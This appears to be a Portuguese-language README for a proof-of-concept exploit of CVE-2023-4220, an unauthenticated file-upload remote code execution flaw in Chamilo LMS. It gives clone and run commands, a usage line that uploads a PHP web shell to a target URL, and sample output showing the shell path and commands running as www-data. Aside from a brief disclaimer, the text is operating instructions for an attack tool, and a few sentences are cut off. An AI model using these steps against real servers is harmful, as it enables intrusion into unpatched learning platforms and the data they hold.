
(CVE-2023-4220) Chamilo LMS Execução Remota de Código por Upload de Arquivo Grande Não Autenticado
Este repositório contém um exploit de prova de conceito (PoC) para a vulnerabilidade identificada como CVE-2023-4220 no Chamilo LMS. Este exploit aproveita uma vulnerabilidade de upload de arquivo não autenticado, permitindo que atacantes remotos executem código arbitrário no sistema afetado.
Aviso: Este código é apenas para fins educacionais e de pesquisa. O autor não é responsável por qualquer uso indevido deste código.
As versões do Chamilo LMS anteriores a este lançamento são vulneráveis a este problema. A vulnerabilidade decorre da validação e manipulação inadequadas de uploads de arquivos, permitindo que atacantes façam upload e executem arquivos maliciosos no servidor.
Este exploit tem como alvo a funcionalidade de upload de arquivos no Chamilo LMS. Ao criar um arquivo malicioso contendo código PHP e enviá-lo através de um endpoint não autenticado, um atacante pode executar comandos arbitrários no servidor.
git clone https://github.com/0x00-null/Chamilo-CVE-2023-4220-RCE-Exploit.git
cd Chamilo-CVE-2023-4220-RCE-Exploit
Execute o exploit passando a URL de destino e o comando que deseja executar como argumentos:
python exploit.py <target_url> <command>
python3 exploit.py http://lms.target-site/ id --shell=my_shell.php
Este comando irá:
Se bem-sucedido, o script exibirá:
Por exemplo:
[+] File uploaded successfully!
[+] Access the shell at: http://lms.target-site/main/inc/lib/javascript/bigupload/files/my_shell.php?cmd=
[+] Command Output: uid=33(www-data) gid=33(www-data) groups=33(www-data)
Este projeto está licenciado sob a Licença MIT.
Para quaisquer dúvidas ou problemas, por favor abra uma issue neste repositório ou entre em contato comigo em [medkamelbouzekria - at - gmail -dot - com].